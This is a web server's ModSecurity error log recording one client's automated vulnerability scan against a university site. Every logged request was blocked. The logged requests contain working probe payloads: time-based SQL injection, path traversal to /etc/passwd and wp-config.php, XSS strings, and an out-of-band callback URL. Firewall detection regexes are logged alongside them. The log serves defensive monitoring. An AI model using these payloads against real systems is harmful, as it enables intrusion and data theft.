[Tue Aug 29 11:35:32.319785 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:data_target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:data_target: vote_score = 1 AND (SELECT 3 FROM (SELECT(SLEEP(6)))gwe)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lMCo-f0AAAVPX5kAAAAF"]
[Tue Aug 29 11:35:33.359655 2023] [:error] [pid 1402] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:arp_template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:arp_template_id: 1 AND (SELECT 8948 FROM (SELECT(SLEEP(6)))iIic)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lcCo-f0AAAV6LB0AAAAI"]
[Tue Aug 29 11:35:34.299416 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/cab-fare-calculator/tblight.php"] [unique_id "ZO11lsCo-f0AAAUJI14AAABB"]
[Tue Aug 29 11:35:34.311384 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:fingerprint. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:fingerprint: (SELECT SLEEP(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lsCo-f0AAASPDRoAAAAS"]
[Tue Aug 29 11:35:34.383890 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: test' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11lsCo-f0AAAUKhDgAAABC"]
[Tue Aug 29 11:35:35.340327 2023] [:error] [pid 1384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11l8Co-f0AAAVoCC0AAAAY"]
[Tue Aug 29 11:35:35.389077 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:queriesCnt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:queriesCnt:  cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO11l8Co-f0AAATQXlQAAAAO"]
[Tue Aug 29 11:36:24.668918 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ); --\\x22 found within ARGS:table_name: pg_user\\x22; select pg_sleep(6); --\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/api/v2/open/rowsInfo"] [unique_id "ZO11yMCo-f0AAASHiC4AAAAD"]
[Tue Aug 29 11:36:24.722990 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11yMCo-f0AAAT@Ky0AAAA2"]
[Tue Aug 29 11:36:25.174576 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../..// found within ARGS:file_name: ../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/tsaupload.cgi"] [unique_id "ZO11ycCo-f0AAAUbg6UAAABQ"]
[Tue Aug 29 11:36:25.674737 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11ycCo-f0AAATQXmgAAAAO"]
[Tue Aug 29 11:36:26.529353 2023] [:error] [pid 1436] [client 143.42.78.27] ModSecurity: Rule 7fe1c67ac3c8 [id "981246"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "239"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfkip.unla.ac.id"] [uri "/xmlpserver/services/XMLPService"] [unique_id "ZO11ysCo-f0AAAWcCPgAAAAL"]
[Tue Aug 29 11:36:28.410941 2023] [:error] [pid 1449] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/ccmivr/IVRGetAudioFile.do"] [unique_id "ZO11zMCo-f0AAAWpXf8AAAAW"]
[Tue Aug 29 11:36:28.463467 2023] [:error] [pid 1407] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:true_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:true_path: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php/Pan/ShareUrl/downloadSharedFile"] [unique_id "ZO11zMCo-f0AAAV-t94AAAAF"]
[Tue Aug 29 11:36:30.374252 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:folder: ../../../../../../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11zsCo-f0AAASEJdsAAAAE"]
[Tue Aug 29 11:36:32.429042 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110MCo-f0AAASHiDQAAAAD"]
[Tue Aug 29 11:36:33.459061 2023] [:error] [pid 1436] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110cCo-f0AAAWcCRMAAAAL"]
[Tue Aug 29 11:36:33.507185 2023] [:error] [pid 1436] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: % found within ARGS:keyword: %61%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%27%27%2b%28%53%45%4c%45%43%54%20%6d%64%35%28%39%39%39%39%39%39%39%29%29%2b%27"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/mobile/plugin/browser.jsp"] [unique_id "ZO110cCo-f0AAAWcCRUAAAAL"]
[Tue Aug 29 11:36:33.527318 2023] [:error] [pid 1438] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:page: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/pandora_console/ajax.php"] [unique_id "ZO110cCo-f0AAAWexjMAAAAP"]
[Tue Aug 29 11:36:34.409057 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:ID: <svg onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO110sCo-f0AAASEJfQAAAAE"]
[Tue Aug 29 11:36:36.964926 2023] [:error] [pid 1457] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ACS_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:ACS_path: ../../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/advanced_component_system/index.php"] [unique_id "ZO111MCo-f0AAAWx8yoAAAAg"]
[Tue Aug 29 11:36:37.367784 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAAT@Kz4AAAA2"]
[Tue Aug 29 11:36:37.424502 2023] [:error] [pid 1434] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///c://windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAAWa-VQAAAAI"]
[Tue Aug 29 11:36:38.372659 2023] [:error] [pid 1405] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/_s_/dyn/Log_highlight"] [unique_id "ZO111sCo-f0AAAV9b0oAAAAA"]
[Tue Aug 29 11:36:39.502917 2023] [:error] [pid 1457] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gs3n7qwhnncigd.oast.site found within TX:1: cjmnbitjmimt14dgn26gs3n7qwhnncigd.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO1118Co-f0AAAWx8zoAAAAg"]
[Tue Aug 29 11:36:41.383875 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO112cCo-f0AAAT@K1UAAAA2"]
[Tue Aug 29 11:36:41.465256 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></iframe><svg/onload=alert(\\x222UdyWLo0lCLqcBCjs5YehILlcGu\\x22)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/ccm/system/panels/page/preview_as_user/preview"] [unique_id "ZO112cCo-f0AAAT@K1kAAAA2"]
[Tue Aug 29 11:36:42.359429 2023] [:error] [pid 1451] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/LetsEncrypt/Index"] [unique_id "ZO112sCo-f0AAAWrxqsAAAAY"]
[Tue Aug 29 11:36:43.414810 2023] [:error] [pid 1451] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:idusuario: '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO1128Co-f0AAAWrxrAAAAAY"]
[Tue Aug 29 11:36:44.435080 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '' found within ARGS:idusuario: ''"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO113MCo-f0AAASEJh0AAAAE"]
[Tue Aug 29 11:36:49.473121 2023] [:error] [pid 1456] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pdf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:pdf: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/report/download.php"] [unique_id "ZO114cCo-f0AAAWwdRYAAAAe"]
[Tue Aug 29 11:36:56.370142 2023] [:error] [pid 1457] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:filename: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/wpsite-background-takeover/exports/download.php"] [unique_id "ZO116MCo-f0AAAWx82gAAAAg"]
[Tue Aug 29 11:36:57.551906 2023] [:error] [pid 1408] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x22@ found within ARGS:login: \\x22<svg/onload=alert(document.domain)>\\x22@gmail.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO116cCo-f0AAAWAguoAAAAG"]
[Tue Aug 29 11:37:07.787967 2023] [:error] [pid 1467] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/download.php"] [unique_id "ZO1188Co-f0AAAW7FKkAAAAE"]
[Tue Aug 29 11:37:09.386373 2023] [:error] [pid 1247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO119cCo-f0AAATfd-oAAAAk"]
